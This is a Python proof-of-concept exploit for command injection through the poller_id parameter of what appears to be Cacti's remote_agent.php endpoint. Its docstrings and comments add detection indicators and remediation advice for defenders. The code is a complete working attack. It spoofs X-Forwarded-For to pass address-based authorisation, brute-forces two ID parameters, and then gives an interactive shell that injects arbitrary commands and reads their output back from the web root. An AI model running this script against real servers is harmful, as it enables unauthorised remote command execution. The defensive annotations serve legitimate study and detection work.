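"""Proof-of-concept client for a command injection via ``poller_id``.

The script talks to ``/remote_agent.php?action=polldata`` on the base URL
given as the first command-line argument.  The path and parameter names
match Cacti's remote agent endpoint, but the page itself does not name the
product or an advisory, so confirm before mapping this to a specific fix.

What the code shows, read from the defender's side:

* Every request carries ``X-Forwarded-For`` set to the target's own
  hostname.  Presumably the endpoint authorises callers by client address
  and trusts this header; verify against the server code.
* ``poller_id`` is sent as a string containing ``;`` and backticks.  The
  script only works if the server places that value in a shell command
  unvalidated.
* Command output is redirected into a randomly named ``.txt`` file and then
  fetched over HTTP.  The script never deletes these files.

Review points for an affected server: accept only integer ``poller_id``
values, do not derive the caller's identity from client-supplied forwarding
headers, and limit which networks can reach ``remote_agent.php``.
Access-log indicators are listed on the functions below.
"""
import random
import sys
from urllib.parse import urlparse

import requests
import urllib3

# Every request below uses verify=False, so TLS certificates are not
# checked; this call only silences the warning urllib3 would print for it.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# The original indexed sys.argv[1] unconditionally and died with IndexError
# when no URL was given; exit with a usage line instead.
if len(sys.argv) < 2:
    sys.exit("usage: {} <base-url>".format(sys.argv[0]))

# Seconds before a request is abandoned.  The original passed no timeout,
# so an unresponsive server blocked the script indefinitely.
REQUEST_TIMEOUT = 10

url = sys.argv[1]
host = urlparse(url).hostname
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
    # Detection: an external request whose X-Forwarded-For equals the
    # server's own hostname is not something a real proxy chain produces.
    "X-Forwarded-For": host,
}


def get_random_str():
    """Return 5 to 9 distinct lowercase ASCII letters in random order.

    Used only to name the output file, so the resulting artefact is a
    ``.txt`` file with a 5-9 letter lowercase stem and no repeated letters.
    """
    return "".join(random.sample('zyxwvutsrqponmlkjihgfedcba', random.randint(5, 9)))


def check_success(file_name):
    """Fetch ``file_name`` from the URL root and return its body.

    Returns the response text on HTTP 200 and ``""`` otherwise, including
    when the request itself fails (the original let that exception escape).
    """
    try:
        res = requests.get(url + "/" + file_name, headers=headers,
                           verify=False, timeout=REQUEST_TIMEOUT)
    except requests.RequestException:
        return ""
    if res.status_code == 200:
        return res.text
    return ""


def send_payload(poller_id, local_data_ids, host_id):
    """Send one ``polldata`` request; return True if it looks like poll output.

    All three values are formatted into the query string as given, with no
    validation here.  A response counts as a hit when it parses as JSON,
    has status 200 and contains the text ``polling_time``.

    Detection: in access logs, ``poller_id`` on this endpoint should be a
    plain integer; any other character in it is worth alerting on.
    """
    payload = "/remote_agent.php?poller_id={}&action=polldata&local_data_ids[0]={}&host_id={}".format(
        poller_id, local_data_ids, host_id)
    try:
        res = requests.get(url + payload, headers=headers,
                           verify=False, timeout=REQUEST_TIMEOUT)
        res.json()  # raises a ValueError subclass when the body is not JSON
    except (requests.RequestException, ValueError):
        # Narrowed from the original blanket ``except Exception: pass``:
        # only transport errors and non-JSON bodies mean "no hit".
        return False
    return res.status_code == 200 and "polling_time" in res.text


def get_ids():
    """Probe ``local_data_ids`` and ``host_id`` over 0-9 each.

    Returns the first ``(local_data_ids, host_id)`` pair for which
    ``send_payload`` reports poll output, or ``None`` when none of the
    100 combinations does.

    Detection: this appears as up to 100 sequential requests to the same
    endpoint, differing only in two small integer parameters.
    """
    for i in range(0, 10):
        for j in range(0, 10):
            print("Trying... local_data_ids:{} ,host_id:{}".format(i, j))
            if send_payload("1", i, j):
                return i, j
    return None


def exploit(cmd, local_data_ids, host_id):
    """Send ``cmd`` through ``poller_id`` and print what comes back.

    The command is wrapped so its output is redirected into a freshly named
    ``.txt`` file, which is then requested from the URL root.  That fetch
    only succeeds if the server-side shell's working directory is served
    over HTTP, presumably the application's web root.

    Forensics: nothing here removes the file, so each command leaves one
    unexpected ``.txt`` file behind in that directory.
    """
    file_name = get_random_str() + ".txt"
    cmd = ";`{} > {}`".format(cmd, file_name)
    send_payload(cmd, local_data_ids, host_id)
    res = check_success(file_name)
    print(res)


if __name__ == '__main__':
    ids = get_ids()
    # get_ids() returns None when no pair responds; the original unpacked
    # the result directly and crashed with TypeError in that case.
    if ids is None:
        sys.exit("No local_data_ids/host_id pair in 0-9 returned polling data")
    local_data_ids, host_id = ids
    print("GET local_data_ids:{} ,host_id:{}".format(local_data_ids, host_id))
    while True:
        cmd = input(">> ")
        if cmd == "exit":
            break
        exploit(cmd, local_data_ids, host_id)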